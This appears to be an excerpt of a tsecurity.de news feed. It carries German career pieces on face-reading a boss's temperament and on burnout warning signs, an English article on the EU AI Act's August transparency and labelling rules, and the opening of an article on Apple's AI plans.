<p class="wp-block-paragraph">Die Formensprache eines Gesichts gibt wertvolle Hinweise. Markante, eckige Formen wie ein breiter Kiefer und dominante Wangenknochen deuten auf das Bewegungsnaturell hin. Solche Chefs sind „Macher“, lieben Herausforderungen und handeln zielstrebig. Ihr <a href="https://www.computerwoche.de/article/3539125/partizipatives-employer-branding-was-fur-den-fuhrungsstil-spricht.html" data-type="link" data-id="https://www.computerwoche.de/article/3539125/partizipatives-employer-branding-was-fur-den-fuhrungsstil-spricht.html">Führungsstil</a> ist dynamisch und durchsetzungsstark. </p>



<p class="wp-block-paragraph">Doch es gibt eine Kehrseite: Diese Persönlichkeiten können dominant wirken und wenig Geduld aufbringen. Ihre direkte Art fordert klare Kommunikation und schnelle Ergebnisse. </p>



<p class="wp-block-paragraph"><strong>Umgangstipp</strong>: Begegnen Sie solchen Chefs mit gut strukturierten Vorschlägen, ohne lange Erklärungen. Struktur und Fakten statt <a href="https://www.cio.de/article/3674908/wie-chefs-ihre-emotionen-in-den-griff-bekommen-2.html" data-type="link" data-id="https://www.cio.de/article/3674908/wie-chefs-ihre-emotionen-in-den-griff-bekommen-2.html">Emotionen</a> sind hier der Schlüssel. Respektieren Sie seine Entscheidungsfreude, aber zeigen Sie, dass Sie selbst eine starke Position vertreten können. </p>



<p class="wp-block-paragraph"> </p>



<h2 class="wp-block-heading">Das Empfindungsnaturell</h2>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/3968607/schwache-chefs-kehren-die-schwachen-ihrer-mitarbeiter-hervor.html" data-type="link" data-id="https://www.computerwoche.de/article/3968607/schwache-chefs-kehren-die-schwachen-ihrer-mitarbeiter-hervor.html">Chefs</a> mit feinen, zarten Gesichtszügen und großen Augen sind dem Empfindungsnaturell zuzuordnen. Diese Persönlichkeiten sind kreativ, emphatisch und feinfühlig. Sie legen Wert auf ein harmonisches Arbeitsumfeld, lieben den Dialog und entwickeln kreative Lösungen gemeinsam mit ihrem Umfeld. </p>



<p class="wp-block-paragraph">Aber aufgepasst: Ihre hohe Sensibilität macht sie empfänglich für Konflikte oder Spannungen. Kritik sollte stets diplomatisch formuliert werden, da sie schnell als persönliche Ablehnung wahrgenommen werden kann. </p>



<p class="wp-block-paragraph"><strong>Umgangstipp</strong>: Bauen Sie Vertrauen auf, zeigen Sie <a href="https://www.computerwoche.de/article/2826599/auf-augenhoehe-trennen.html" data-type="link" data-id="https://www.computerwoche.de/article/2826599/auf-augenhoehe-trennen.html">Wertschätzung</a> und Respekt und präsentieren Sie Ideen als Teil eines gemeinsamen Prozesses. </p>



<p class="wp-block-paragraph"> </p>



<h2 class="wp-block-heading">Das Ernährungsnaturell</h2>



<p class="wp-block-paragraph">Schließlich gibt es Chefs, deren Gesichtszüge durch runde Formen geprägt sind – typische Zeichen des Ernährungsnaturells. Sie schätzen Stabilität, Behaglichkeit und klare Strukturen. Ihr Führungsstil ist pragmatisch und auf langfristige Sicherheit ausgerichtet. Sie sind ausgezeichnete <a href="https://www.computerwoche.de/article/3607605/wie-chefs-das-netzwerken-der-mitarbeiter-fordern.html" data-type="link" data-id="https://www.computerwoche.de/article/3607605/wie-chefs-das-netzwerken-der-mitarbeiter-fordern.html">Netzwerker</a> und lieben es, Ressourcen zu planen und zu verteilen.  </p>



<p class="wp-block-paragraph">Achtung: Ihre Komfortzone kann manchmal eine gewisse Trägheit mit sich bringen und sie neigen dazu, Veränderungen nur sehr langsam zu akzeptieren. Sie schätzen bewährte Lösungen und haben eine Vorliebe für Traditionen. </p>



<p class="wp-block-paragraph"><strong>Umgangstipp:</strong> Argumentieren Sie pragmatisch und betonen Sie die Vorteile von Stabilität und Sicherheit. Geben Sie ihnen die Zeit, neue Ideen zu durchdenken und zeigen Sie vor allem klar auf, wie einfach und sinnhaft die Umstellung zum langfristigen Erfolg beiträgt. </p>



<p class="wp-block-paragraph"> </p>



<h2 class="wp-block-heading">Die Mischung macht’s: Kombinierte Naturelle und ihre Ansprechbarkeit</h2>



<p class="wp-block-paragraph">In der Realität sind die wenigsten Menschen einem einzigen Naturell klar zuzuordnen. Häufig vereinen Gesichter Merkmale von zwei – manchmal sogar drei – Naturellen. So treffen beispielsweise die Zielstrebigkeit des Bewegungsnaturells und die Empathie des Empfindungsnaturells aufeinander oder die Stabilität des Ernährungsnaturells wird durch kreative Aspekte des Empfindungsnaturells ergänzt. </p>



<p class="wp-block-paragraph">Viele <a href="https://www.computerwoche.de/article/2774719/nicht-jeder-stellvertreter-eignet-sich-zum-thronfolger.html" data-type="link" data-id="https://www.computerwoche.de/article/2774719/nicht-jeder-stellvertreter-eignet-sich-zum-thronfolger.html">Führungspersönlichkeiten</a> sind übrigens klare Bewegungs-Ernährungs-Naturelle, da der ihnen innewohnende Pragmatismus und die Zielorientiertheit durch die Dynamik des Bewegungsnaturells angeschoben wird. </p>



<p class="wp-block-paragraph"><strong>Tipp</strong>: Achten Sie darauf, welche Merkmale stärker ausgeprägt sind, und gestalten Sie Ihr Verhalten und Ihre Kommunikation entsprechend, das eröffnet ganz neue Möglichkeiten der <a href="https://www.computerwoche.de/article/2830181/so-geht-generationsuebergreifende-zusammenarbeit.html" data-type="link" data-id="https://www.computerwoche.de/article/2830181/so-geht-generationsuebergreifende-zusammenarbeit.html">Zusammenarbeit</a>. </p>



<p class="wp-block-paragraph"> </p>



<h2 class="wp-block-heading">„Du“-Denken oder „Ich“-Denken: Welcher Typ ist Ihr Chef? </h2>



<p class="wp-block-paragraph">Ein weiterer Aspekt der <a href="https://www.computerwoche.de/article/3807778/ki-erkennt-am-gesicht-wer-fur-einen-job-geeignet-ist.html" data-type="link" data-id="https://www.computerwoche.de/article/3807778/ki-erkennt-am-gesicht-wer-fur-einen-job-geeignet-ist.html">Gesichtsdeutung</a> ist, ob jemand im „Ich-“ oder „Du-Modus“ agiert. Eingefallene Wangen und eine große Nase deuten auf ein „Ich“-Denken hin – ergebnisorientiert und zielgerichtet, aber weniger mitarbeiterbezogen. Eine hohe Stirn, volle Wangen und offene Augen signalisieren dagegen den „Du-Modus“. Solche Chefs schätzen <a href="https://www.computerwoche.de/article/2743092/wenn-kollegen-gift-fuers-teamwork-sind.html" data-type="link" data-id="https://www.computerwoche.de/article/2743092/wenn-kollegen-gift-fuers-teamwork-sind.html">Teamgeist</a> und gemeinsame Lösungen. </p>



<p class="wp-block-paragraph"><strong>Tipp</strong>: Stimmen Sie Ihre Kommunikation darauf ab. „Ich“-Denker schätzen klare Ergebnisse, während „Du“-Denker einen wertschätzenden Dialog bevorzugen. </p>



<p class="wp-block-paragraph"> </p>



<h2 class="wp-block-heading">Nutzen statt Urteilen: Wie Gesichtslesen Ihre Arbeitsbeziehung verbessert</h2>



<p class="wp-block-paragraph">Die Psychophysiognomie ist keine Wahrsagerei, sondern eine klare Methode, um Menschen besser zu verstehen. Indem Sie die Gesichtsstruktur Ihres Chefs analysieren, erkennen Sie, was ihn antreibt und wie Sie Konflikte vermeiden können. Dieses Wissen hilft, Vertrauen aufzubauen und effektiver zu agieren. </p>



<p class="wp-block-paragraph">Fakt ist, das Gesichtslesen schärft den Blick für die Einzigartigkeit jedes Menschen, reduziert Missverständnisse und verbessert die Zusammenarbeit. In einer Welt, die stark von zwischenmenschlichen Verbindungen abhängt, ist dies ein unschätzbarer Vorteil. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[9 Anzeichen, dass Sie kurz vorm Burnout stehen]]></title>
<description><![CDATA[Trotz Überlastung immer funktionieren zu wollen, macht krank.Mangostar – shutterstock.com



Programmierer, so lautet ein populäres Bonmot, sind Maschinen, die Koffein in Code verwandeln. Das trifft auch auf viele andere Freiberufler zu. Der hohe Koffeinbedarf hängt damit zusammen, dass Freelance...]]></description>
<link>https://tsecurity.de/de/3695006/it-security-nachrichten/9-anzeichen-dass-sie-kurz-vorm-burnout-stehen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695006/it-security-nachrichten/9-anzeichen-dass-sie-kurz-vorm-burnout-stehen/</guid>
<pubDate>Sun, 26 Jul 2026 06:33:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.37.39.png?w=1024" alt="Überlastung" class="wp-image-4200773" width="1024" height="571" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Trotz Überlastung immer funktionieren zu wollen, macht krank.</figcaption></figure><p class="imageCredit">Mangostar – shutterstock.com</p></div>



<p class="wp-block-paragraph">Programmierer, so lautet ein populäres Bonmot, sind Maschinen, die Koffein in <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Code</a> verwandeln. Das trifft auch auf viele andere Freiberufler zu. Der hohe Koffeinbedarf hängt damit zusammen, dass Freelancer allzu oft genau dann arbeiten, wenn ihr Gehirn sich lieber auf Stand-by schalten und zur Ruhe begeben möchte, nämlich nachts.</p>



<p class="wp-block-paragraph">Sogar ein Buch gibt es schon, das sich mit diesem Phänomen und seinen Ursachen beschäftigt (“<a href="https://swizec.com/blog/why-programmers-work-at-night-2/" target="_blank" rel="noreferrer noopener">Why Programmers work at Night</a>“). Gesund ist die Nachtarbeit nicht, ebenso wenig wie das ständige Zuviel an <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Arbeit</a> und ein paar andere Arbeits- und Lebensgewohnheiten, die vielen Freiberuflern zu eigen sind.</p>



<h2 class="wp-block-heading">Work-Life-Balance in Schieflage geraten</h2>



<p class="wp-block-paragraph">Nach Ansicht von Karol Krol, einem polnischen Blogger, <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Programmierer</a> und Internetunternehmer, stehen viele Freelancer kurz vor dem Burnout, ohne es zu merken. Wir sagen Freiberuflern, woran sie feststellen können, dass ihre Work-Life-Balance bedrohlich in die Schieflage geraten ist.</p>



<h2 class="wp-block-heading">1. Sie arbeiten oft bis spät in die Nacht</h2>



<p class="wp-block-paragraph">Menschen sind keine Eulen und keine Fledermäuse, sondern biologisch eindeutig tagaktive Tiere. Sie sehen gut am Tag und schlecht in der Nacht. Sich einzureden, man sei nachts am produktivsten oder könne nachts “einfach am besten arbeiten”, ist in aller Regel Selbstbetrug. Wer nachts kein Ende findet, hat entweder insgesamt zu viel <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Arbeit</a> oder schafft es nicht, sich tagsüber Ablenkungen zu entziehen.</p>



<h2 class="wp-block-heading">2. Sie kommen morgens nicht in Gang</h2>



<p class="wp-block-paragraph">Natürlich: Kalt duschen, ein schneller Kaffee und 20 Minuten nach dem Weckerklingeln am Schreibtisch sitzen – das schaffen die wenigsten. Aber wer auch zwei oder drei Stunden nach dem Aufstehen nicht in der Lage ist, die ersten Dinge auf der To-do-Liste anzugehen, hat ein Problem. Ein Grund kann – natürlich – chronische <a href="https://cio.de/article/3665643/teams-ziehen-muede-kollegen-mit.html" target="_blank">Müdigkeit</a> sein, ein anderer die Tatsache, dass Sie Ihren Arbeitstag nicht als begrenztes, achtstündiges Gebilde betrachten. Sie sind eigentlich immer im Arbeitsmodus – und haben deshalb auch nie Freizeit.</p>



<h2 class="wp-block-heading">3. Sie haben keine Zeit für Entspannung</h2>



<p class="wp-block-paragraph">Nie abzuschalten, ist hochgradig gesundheitsgefährdend. Gerade Menschen, die grundsätzlich viel leisten können und wollen, brauchten unbedingt Erholungsphasen, damit ihre Kraft erhalten bleibt. Dabei genügt es nicht, auf dem Sofa zu liegen und über den nächsten <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Job</a> nachzudenken. Denn auch das Gehirn braucht Entspannung. Wer es ihm nie gönnt, ist allein schon deshalb ein Burnout-Kandidat.</p>



<h2 class="wp-block-heading">4. Ihre Standardantwort ist: Keine Zeit!</h2>



<p class="wp-block-paragraph">Wie oft haben Sie zuletzt gesagt: “Ich kann nicht, bin gerade im Stress!”, wenn ein Freund mit Ihnen ein Bier trinken gehen wollte? Wenn Sie seit drei Wochen oder mehr außer Arbeiten nichts gemacht haben, dann stimmt etwas nicht. Ein Leben, das ausschließlich aus <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Arbeit</a> besteht, kann nicht Ihr Ziel sein.</p>



<h2 class="wp-block-heading">5. Jobs werden nicht pünktlich fertig</h2>



<p class="wp-block-paragraph">Das kann natürlich ganz unterschiedliche Gründe haben: insgesamt zu viel Arbeit, schlechte Organisation, schlechtes Briefing durch den Auftraggeber etc.<br>Der häufigste und gefährlichste Grund hängt allerdings eng mit Punkt zwei dieser Liste zusammen: Dadurch, dass sie immer im Arbeitsmodus sind und ihr Arbeitstag gefühlt 24 Stunden hat, gaukelt das <a href="https://cio.de/article/3669593/wie-manager-besser-entscheiden-2.html" target="_blank">Unterbewusstsein</a> Ihnen vor, Sie hätten für alles unendlich viel Zeit. Also gibt es auch keinen Grund, sofort mit irgendwas anzufangen.</p>



<h2 class="wp-block-heading">6. Keine Zeit für eigene Projekte</h2>



<p class="wp-block-paragraph">Freiberufler zu sein bedeutet, Freiheiten zu haben. Zum Beispiel die, neben den Jobs für Ihre Kunden eigene Projekte anzuschieben. Doch ein solches Projekt zu starten ist eine Sache, es anschließend auch durchzuziehen, eine andere. Wenn Sie mindestens ein Projekt haben, an das Sie glauben, das aber schon seit einem halben Jahr darauf wartet, weiterverfolgt zu werden, sollten Sie sich fragen, warum Sie ursprünglich gerne Freiberufler sein wollten.</p>



<h2 class="wp-block-heading">7. Sie haben keine Hobbys</h2>



<p class="wp-block-paragraph">Oder doch, haben Sie natürlich schon, aber Sie kommen schon ewig nicht mehr dazu. Das Klavier ist seit einem Jahr so verstimmt, dass es keinen Spaß mehr macht. Den Klavierstimmer anrufen? Keine Zeit. Siebzig Euro kostet der Fitness-Club Sie jeden Monat, aber Sie haben keine Ahnung, wann Sie zuletzt dort waren.</p>



<h2 class="wp-block-heading">8. Sie lesen fast nie mehr ein Buch</h2>



<p class="wp-block-paragraph">Klar, auch viele <a href="https://cio.de/article/3667117/chefs-haben-weniger-stress-als-mitarbeiter.html" target="_blank">Angestellte</a> tun das nicht. Aber für fast alle fällt Lesen in die Rubrik: Dinge, die ich schon lange mal wieder tun wollte. Wer Bücher liest, beweist sich selbst, dass er zumindest gelegentlich gerne auf andere Gedanken kommen möchte. Und dass er entschlossen ist, sich auch mal zu entspannen.</p>



<h2 class="wp-block-heading">9. Freundschaften schlafen ein</h2>



<p class="wp-block-paragraph">Mehrere Menschen, die Ihnen lieb und teuer sind, haben Sie seit Monaten nicht mehr gesprochen. Nehmen Sie sich vor, einmal pro Woche zum Hörer zu greifen und Menschen anzurufen, die ihnen wichtig sind. Oder die Ihnen mit gutem Grund einmal wichtig waren.</p>



<h3 class="wp-block-heading">Stress</h3>



<p class="wp-block-paragraph">… und ziehen Sie Yoga und weitere Meditationsübungen in Betracht. Diese Übungen sind die besten Mittel gegen Stress und tragen dazu bei, Stressgefühle abzubauen. Ganz abgesehen vom gesundheitlichen Nutzen dienen die Trainings auch dazu, den Stress besser zu managen.<br><br>Obwohl wir natürlich seit unserer Geburt atmen, wissen die meisten von uns nicht, wie man richtig atmet. Viele atmen in einer oberflächlichen Art und Weise – besonders in stressbetonten oder unruhigen Zeiten. Tiefes Atmen durch den Bauch kann zur inneren Ruhe beitragen. Und es hilft, in unbequemen und angespannten Situationen einen kühlen Kopf zu bewahren.<br><br>Wer sich die Zeit nimmt um darüber zu sprechen, wie die vielen Veränderungen und Schwierigkeiten am Arbeitsplatz die einzelnen Mitarbeiter bewegen, kann die Arbeitsmoral heben. Es ist ein Fehler zu glauben, Menschen seien nicht verängstigt und besorgt und der Arbeitsplatz sei davon nicht betroffen.<br><br>Die Zeiten sind angespannt und schwierige Veränderungen in Organisationen sind die Regel. Daher sind Ehrlichkeit, Glaubwürdigkeit und Offenheit so wichtig. Heute ist es mehr als je zuvor entscheidend, eine positive Einstellung in der Belegschaft auszulösen. Stellen Sie Fragen, die zu Lösungen ermuntern wie “Was läuft heute gut, was sind unsere Stärken, wie möchten wir, dass dieses Unternehmen aussieht?”<br><br>Leute arbeiten intensiver für das, woran sie glauben und was sie zur Schaffung beigetragen haben. Das ist ein entscheidender Punkt, der während einer tiefgreifenden Umgestaltung am Arbeitsplatz geprüft werden muss. Was das mögliche Ausmaß des Arbeitsplatz-Wandels betrifft, sollten Mitarbeiter frühzeitig in die Entwicklung einbezogen werden.<br><br>Bücher, Gruppen, Familie und enge Freunde sowie Trainer können wichtige Quellen sein, um sich den eigenen Gefühlen bewusster zu werden. Auch kann man dadurch leichter lernen, mit diesen Gefühlen umzugehen, um sich über sein Verhalten im Klaren zu werden. Besonders sollte man darauf achten, wie man andere Menschen anspricht.<br><br>Was man tut oder lässt, hat direkten Einfluss darauf, was Mitarbeiter glauben, was akzeptabel ist. Seien Sie ein überzeugendes Beispiel dafür, dass ein ausgeglichenes Verhältnis zwischen Beruf und Privatleben von Bedeutung ist. Essen Sie mit anderen zu Mittag und motivieren Sie Kollegen dazu mitzukommen. Auch Spaß und Lachen am Arbeitsplatz sind erwünscht, da dies Stress reduzierende Faktoren sind.<br><br>Wer sich immer nur auf das Negative konzentriert, tut weder seiner Gesundheit noch seiner Denkweise einen Gefallen. Und seien wir ehrlich: Der Anteil an positiven und erbaulichen Geschichten in den Nachrichten fällt eindeutig spärlich aus. Es ist extrem wichtig, sich so gut wie möglich von jeglichem Trübsal abzukapseln und wieder mit Leuten Kontakt aufnehmen bzw. Dinge zu tun, die Spaß machen.<br><br>Konzentrieren Sie sich auf den Kern Ihrer Arbeit. Jetzt ist Zeit, mit den Mitarbeitern Prioritäten zu setzen und sich darüber Gedanken zu machen, welche Projekte einen perfekten Lösungsansatz erfordern. Nicht jedes Projekt kann an oberster Stelle stehen. Gerade in wirtschaftlich angespannten Zeiten sind Brainstorming-Sitzungen wichtiger denn je.<br></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The EU’s AI transparency deadline is weeks away. Is your enterprise ready?]]></title>
<description><![CDATA[Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.



To assist in the effort, the European Commission (Commission) has published guidelines to help AI deployers get in line with the AI Act’...]]></description>
<link>https://tsecurity.de/de/3694779/ai-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694779/ai-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.</p>



<p class="wp-block-paragraph">To assist in the effort, the European Commission (Commission) has published <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1653" target="_blank" rel="noreferrer noopener">guidelines</a> to help AI deployers get in line with the AI Act’s transparency obligations, which will begin to go into effect on August 2.</p>



<p class="wp-block-paragraph">After that, companies providing AI systems must alert users when they are interacting with AI. They must also tell users when they have been exposed to deepfakes, “emotion recognition,” or biometric categorization systems, or when they are given AI-manipulated content in matters of “public interests without human review or editorial control.”</p>



<p class="wp-block-paragraph"><a href="https://commission.europa.eu/about/organisation/college-commissioners/henna-virkkunen_en" target="_blank" rel="noreferrer noopener">Henna Virkkunen</a>, the Commission’s executive VP for tech sovereignty, security and democracy, said in a statement, “with today’s guidelines, the Commission supports the smooth and effective application of the AI Act to make AI systems interacting with people such as chatbots and AI agents and AI content more transparent and trustworthy. These guidelines support providers and deployers in meeting their obligations under the AI Act, while helping citizens know when they are interacting with AI.”</p>



<p class="wp-block-paragraph">Systems must include machine-readable markers to reveal such content, to reduce “the risk of deception and manipulation” and build public trust in AI.</p>



<p class="wp-block-paragraph">“Generative systems have collapsed the cost of producing convincing content while the cost of judging it stands where it always stood,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. This requirement is “an attempt to restore friction to that imbalance.”</p>



<p class="wp-block-paragraph">A company’s non-compliance could result in fines anywhere from €750K (about $856K) to €15M (about $17 million), or even up to 3% of its total worldwide annual revenue.</p>



<h2 class="wp-block-heading">Transparency requirements</h2>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/2096040/what-it-leaders-need-to-know-about-the-eu-ai-act.html" target="_blank">EU AI Act’s</a> transparency requirements apply to “natural or legal persons,” public authorities, agencies, or other bodies that develop AI systems, or have them developed, and place them on the EU market or into use under their name or trademark. This means all companies, regardless of whether or not they are EU-based.</p>



<p class="wp-block-paragraph">“Systems placed on the European market, put into service there, or producing outputs used there are inside the field, wherever the developer sits,” Gogia noted.</p>



<p class="wp-block-paragraph">Applicable systems must be intended to interact directly with “natural persons”; these systems include AI-enabled chatbots or conversational agents, AI companions, or coding agents. However, AI-enabled tools like recommender systems, spam filters, authentication, search and retrieval, transcription, text and code auto-completion, or predictive maintenance do not fall under the rule.</p>



<p class="wp-block-paragraph">Specific outputs such as AI-generated text, images, video, and audio must contain a machine-readable mark. Deepfakes and public interest-related text created by AI without human review or control must be clearly labeled, however, deepfake content that is “artistic, creative, satirical, or fictional” is largely exempt.</p>



<p class="wp-block-paragraph">AI content must be marked with one of three labels: “AI,” “Fully AI-generated,” or “Partially AI-modified.” For instance, “Fully AI-generated” applies when news summaries, music, art, or videos have been created without any human oversight (apart from prompting), while “partially AI-modified” could mean a person’s face is swapped into an authentic photograph to create a deepfake.</p>



<p class="wp-block-paragraph">The three icons are publicly available for free use; enterprises can download zip files in <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129547" target="_blank" rel="noreferrer noopener">PNG</a> and <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129546" target="_blank" rel="noreferrer noopener">SVG</a> formats.</p>



<p class="wp-block-paragraph">Most of the <a href="https://www.cio.com/article/4032894/analysis-of-the-european-ai-regulation-one-year-after-its-entry-into-force.html" target="_blank">Act’s transparency rules</a> begin to go into effect on August 2. But AI systems placed on the market before then will have some leeway; they must be in compliance by December 2.</p>



<p class="wp-block-paragraph">However, a four-month allowance “on one obligation, for one population of systems, contingent on one procedural step, is not a strategy,” Gogia emphasized. Enterprises should plan to comply by August 2 and “treat any relief that arrives as margin.”</p>



<h2 class="wp-block-heading">A consistent code of practice</h2>



<p class="wp-block-paragraph">Along with the transparency guidelines, the Commission has introduced a <a href="https://digital-strategy.ec.europa.eu/en/policies/code-practice-ai-generated-content" target="_blank" rel="noreferrer noopener">code of practice</a> that essentially serves as a gesture of good faith. When signed, it can provide “legal certainty” and a “simple and practical” way to demonstrate compliance with the <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">AI Act</a>, according to the Commission. Signatories can also collaborate through the ‘Signatory Taskforce,’ which will share practices and advance technologies around marking and labeling practices.</p>



<p class="wp-block-paragraph">Providers that choose not to sign must comply through other methods and demonstrate that those methods are “adequate” through assessment by surveillance authorities, according to the Commission.</p>



<p class="wp-block-paragraph">Non-signatories “keep their flexibility, and will face more case-by-case scrutiny for it,” said Gogia.</p>



<h2 class="wp-block-heading">Criteria for compliance </h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, pointed out that the transparency requirements apply to content only when three criteria are met: It has been published, is informative to the public, or is on matters of public interest.</p>



<p class="wp-block-paragraph">B2B business content or blogs may not need an AI disclosure if they do not meet these criteria, he noted. Also, published text that has undergone human review or is under editorial control does not need to be labeled. Editorial control means that a person must hold the ultimate legal responsibility for the publication of the content.</p>



<p class="wp-block-paragraph">Many companies like Google, Adobe, and LinkedIn have already established ways to identify images marked as AI-generated. Meta has made it a requirement, but the creator has to add the AI-generated label, Bellamkonda said.</p>



<p class="wp-block-paragraph">“This is a good move for <a href="https://www.computerworld.com/article/4164963/eu-lawmakers-fail-to-agree-on-watered-down-ai-act-talks-pushed-to-may.html" target="_blank">guardrails</a> around public information, and companies with good compliance and ethical oversight may not have to worry about this,” he noted. But as a general practice, companies should disclose AI-generated content and state whether it has been human reviewed.</p>



<h2 class="wp-block-heading">Creating a transparency pipeline</h2>



<p class="wp-block-paragraph">Establishing full transparency means identifying who carries the responsibility for the content, whether the marking survives real use, not just testing, and what evidence will defend the decision, Gogia said.</p>



<p class="wp-block-paragraph">Concerns cluster around responsibility, durability and evidence. Several organizations usually touch one piece of content, and none controls the whole chain, which is why contracts become the “pressure point,” he said. Most current agreements were written to deliver software and say “almost nothing” about provenance persistence, verification access, or evidence retention.</p>



<p class="wp-block-paragraph">The durability concern is the most difficult, Gogia noted, because marking performs well in controlled settings but “badly in ordinary life.” Meta, for one, said its invisible watermark was designed to survive cropping; a published test, however, found the company’s preview detector missed <a href="https://www.reuters.com/business/meta-ai-image-detector-fails-identify-some-its-own-cropped-ai-images-reuters-2026-07-10/" target="_blank" rel="noreferrer noopener">55% of cropped images</a>.</p>



<p class="wp-block-paragraph">“CIOs should ask which platform can actually provide evidence before believing its dashboard,” said Gogia.</p>



<p class="wp-block-paragraph">Disclosure of AI use must be “clear, distinguishable and accessible,” he emphasized. “A notice buried in lengthy terms, or reachable only through determined clicking, satisfies nobody, least of all a market surveillance authority.”</p>



<p class="wp-block-paragraph">Sustained compliance is a “living control” requiring a central record of systems, duties and evidence; testing taking place where the user meets the control rather than where the developer built it; and continuous supplier assurance. Enforcement will vary by country, so keep one common baseline with local overlays, Gogia said.</p>



<p class="wp-block-paragraph">His advice: Inventory every system that talks to people, generates content, or gauges sentiment; classify provider and deployer roles; place disclosures at first interaction; define substantive human review; keep the evidence.</p>



<p class="wp-block-paragraph">Marks and provenance signals should be tested after content undergoes cropping, compression, translation, transcription, and other editing, Gogia said. A useful audit starts from a real output and follows its “pulse” through generation, editing and publication, identifying at “each beat” the responsible party, the surviving mark, and evidence for exceptions. Missed labels should also be traced for root cause and recurrence.</p>



<p class="wp-block-paragraph">To ensure compliance, before August 2, enterprises need a prioritized inventory, live disclosures on the highest-risk use cases, and a “named owner for every control,” he noted. In the first 30 days, they should stabilize and test; in the first 90 days, push requirements into procurement processes as a standing discipline. Procurement must secure commitments on marking methods, known failure modes, and evidence access, with explicit notice if/when any of them change.</p>



<p class="wp-block-paragraph">“The sensible architecture is a common transparency baseline carrying traceability, responsibility, and evidence, with jurisdictional overlays for language, sector rules, and local practice,” Gogia said.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4199109/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple could ‘run the table’ on AI if it does things right]]></title>
<description><![CDATA[Looking ahead just a short time, Apple could hold a powerful position in AI where it most makes sense: deployment.



Not only will the company offer up its own AI models for the kind of tasks millions use ChatGPT to do today, but it will provide more sophisticated on-device agentic models to hel...]]></description>
<link>https://tsecurity.de/de/3694780/ai-nachrichten/apple-could-run-the-table-on-ai-if-it-does-things-right/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694780/ai-nachrichten/apple-could-run-the-table-on-ai-if-it-does-things-right/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Looking ahead just a short time, Apple could hold a powerful position in AI where it most makes sense: deployment.</p>



<p class="wp-block-paragraph">Not only will the company offer up its own AI models for the kind of tasks millions use ChatGPT to do today, but it will provide more sophisticated on-device agentic models to help users get things done through Siri AI.</p>



<p class="wp-block-paragraph">Apple also <a href="https://www.macobserver.com/news/apple-calls-its-new-assistant-siri-ai-at-wwdc-2026-gemini-partnership-now-official/" target="_blank" rel="noreferrer noopener">offers limited capacity for more complex tasks</a> through <a href="https://www.applemust.com/apple-commences-us-manufacturing-of-private-cloud-compute-servers/" target="_blank" rel="noreferrer noopener">Private Cloud Compute</a>, and, in partnership with the likes of Google in the US and Alibaba in China, the company is giving users a trusted conduit through which to access even more sophisticated AI services. </p>



<h2 class="wp-block-heading"><strong>Deeply deployable</strong></h2>



